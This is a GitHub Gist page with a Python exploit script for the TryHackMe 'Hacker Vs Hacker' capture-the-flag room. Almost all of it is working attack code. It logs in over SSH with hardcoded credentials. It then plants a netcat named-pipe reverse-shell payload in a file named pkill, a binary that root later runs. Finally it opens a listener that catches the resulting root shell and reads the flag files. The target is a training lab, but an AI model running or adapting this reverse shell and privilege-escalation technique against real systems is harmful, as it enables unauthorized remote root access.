Last active
August 25, 2022 08:27
-
-
Save heapbytes/506f50df045a62a88a0107775bff107b to your computer and use it in GitHub Desktop.
TryHackme Hacker Vs Hacker exploit script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import subprocess | |
import paramiko | |
import os | |
import time | |
from pwn import * | |
#import socket | |
#from termcolor import colored | |
#import netifaces as ni | |
def my(): | |
my.ip = os.popen("ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'").read().strip() | |
my.port = 4442 | |
def stable(ip, user, passwd): | |
ssh = paramiko.SSHClient() | |
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
ssh.connect(ip, username=user, password=passwd) | |
print('[*] Stabalizing Shell') | |
payload = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {my.ip} {my.port} >/tmp/f' | |
command = f'echo "{payload}" > ./bin/pkill && chmod +x ./bin/pkill && cat user.txt' | |
(stdin, stdout, stderr) = ssh.exec_command(command) | |
try: | |
if(stdin, stdout, stderr): | |
uflag = stdout.read().decode('ascii').strip("\n") | |
print('[*]Gettign User flag') | |
print('\n', "\033[48;5;236m\033[38;5;231mUser \033[38;5;208mFlag: \033[0;0m", uflag) | |
print('\n[*]Getting root flag') | |
shell() | |
except Exception as e: | |
print(e) | |
def shell(): | |
with process(['nc', '-nvlp', f'{my.port}']) as p: | |
p.recv(1024) | |
p.sendline(b'cat root.txt') | |
rflag = p.recv().decode() | |
print('\n', "\033[48;5;236m\033[38;5;231mRoot \033[38;5;208mFlag: \033[0;0m", rflag) | |
#p.interactive() | |
#uncomment the previous line for spawning root shell | |
p.close() | |
if __name__ == '__main__': | |
my() | |
print(f'[*] Starting exploit on {sys.argv[1]} \n') | |
stable(sys.argv[1], 'lachlan', 'thisistheway123') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment